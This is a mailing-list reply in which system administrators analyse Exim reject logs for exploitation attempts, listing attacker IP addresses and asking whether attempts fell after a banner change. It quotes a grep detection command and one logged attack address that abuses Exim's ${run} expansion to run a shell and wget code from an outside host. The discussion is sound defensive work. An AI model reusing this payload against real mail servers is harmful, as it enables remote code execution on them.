Hi.
On Fri, Jun 21, 2019 at 06:36:20AM +1000, Andrew McGlashan wrote:
> On 21/6/19 5:52 am, Reco wrote:
> > Plain old grep is more than enough here. This one:
> >
> > grep 'run{' /var/log/exim4/reject*
> >
> > finds things like these:
> >
> > 2019-06-19 18:54:43 H=(service.com) [107.182.225.42]
> > F=<supp...@service.com> rejected RCPT
> > <root+${run{\x2Fbin\x2Fsh\t-c\t\x22wget\x2064.50.180.45\x2ftmp\x2fxxx.
> xxx.xxx.xxx\x22}}@localhost>:
> > Unrouteable address
>
> Okay:
> 21 attempts from 8 different IP addresses on one server
> 1 [163.172.157.143]
> 2 [188.138.0.205]
> 3 [23.129.64.152]
> 4 [23.129.64.193]
> 5 [27.69.172.214]
> 6 [45.55.94.254]
> 7 [51.15.227.108]
> 8 [89.248.171.57]
>
> 28 attempts on another server
> 1 [149.56.142.192]
> 2 [163.172.157.143]
> 3 [188.138.0.205]
> 4 [27.69.172.229]
> 5 [51.15.227.108]
> 6 [51.77.148.55]
> 7 [85.58.114.228]
> 8 [89.248.171.57]
>
> 17 attempts on another server
> 1 [188.138.0.205]
> 2 [89.248.171.57]
> 3 [98.158.184.125]
>
>
> 13 unique IP addresses so far.... (dig -x output)
>
> 1 149.56.142.192 192.ip-149-56-142.net.
> 2 163.172.157.143 143-157-172-163.rev.cloud.scaleway.com.
> 3 188.138.0.205 static-ip-188-138-0-205.inaddr.ip-pool.com.
> 4 23.129.64.152
> 5 23.129.64.193
> 6 27.69.172.214 localhost.
> 7 27.69.172.229 localhost.
> 8 45.55.94.254
> 9 51.15.227.108 108-227-15-51.rev.cloud.scaleway.com.
> 10 51.77.148.55 55.ip-51-77-148.eu.
> 11 85.58.114.228 228.pool85-58-114.dynamic.orange.es.
> 12 89.248.171.57 scanner20.openportstats.com.
> 13 98.158.184.125 206.217.215.125.static.midphase.com.
What I'm most interested is here is the time distribution.
I.e. has the number of exploitation attempts lowered after the Exim
banner change? Stayed the same?
Reco
